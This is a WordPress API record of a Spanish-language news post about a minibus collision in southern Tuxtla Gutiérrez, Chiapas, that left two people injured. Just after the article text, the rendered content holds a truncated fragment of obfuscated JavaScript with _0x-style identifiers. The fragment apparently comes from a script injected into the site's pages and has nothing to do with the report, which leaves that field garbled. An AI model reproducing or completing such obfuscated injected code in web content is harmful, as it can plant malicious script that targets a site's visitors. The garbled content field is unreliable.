{"id":5036,"date":"2022-09-12T22:54:21","date_gmt":"2022-09-12T22:54:21","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5036"},"modified":"2022-09-12T22:54:22","modified_gmt":"2022-09-12T22:54:22","slug":"colectivazo-en-la-zona-sur-de-tuxtla-gutierrez-deja-dos-lesionados","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5036","title":{"rendered":"Colectivazo en la zona Sur de Tuxtla Guti\u00e9rrez deja dos lesionados"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"541\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663023120184.jpg\" alt=\"\" class=\"wp-image-5037\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663023120184.jpg 960w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663023120184-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/FB_IMG_1663023120184-768x433.jpg 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 12 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un colectivazo ocurrido este lunes por la ma\u00f1ana en la zona Sur de Tuxtla Guti\u00e9rrez, dej\u00f3 un saldo de dos personas lesionadas.Los reportes de tr\u00e1nsito informaron que, todo ocurri\u00f3 cuando el conductor de la unidad de la ruta 61-118 con n\u00famero econ\u00f3mico 04 se impact\u00f3 contra una Suv de color negro de la marca Mitsubishi cuando circulaba en el perif\u00e9rico sur y bulevar anillo perif\u00e9rico a la altura de las oficinas del Inifech.Testigos informaron que, el conductor iba distra\u00eddo y conduc\u00eda a exceso de velocidad se impact\u00f3 contra la unidad part\u00edcular en el sentido de Oriente a Poniente.Por el golpe los ocupantes resultaron heridos en el cuello y brazos pero no fueron trasladados a un nosocomio.Al lugar arribaron elementos de tr\u00e1nsito para recabar datos. El conductor de la Urvan asumi\u00f3 la responsabilidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 12 de septiembre del 2022. Tuxtla Guti\u00e9rrez.- Un colectivazo ocurrido este lunes por la ma\u00f1ana en la zona Sur de Tuxtla Guti\u00e9rrez, dej\u00f3 un saldo de dos personas lesionadas.Los reportes de tr\u00e1nsito informaron que, todo ocurri\u00f3 cuando el conductor de la unidad de la ruta 61-118 con n\u00famero econ\u00f3mico 04 se impact\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5037,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5036","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5036","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5036"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5036\/revisions"}],"predecessor-version":[{"id":5038,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5036\/revisions\/5038"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5037"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5036"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5036"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5036"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}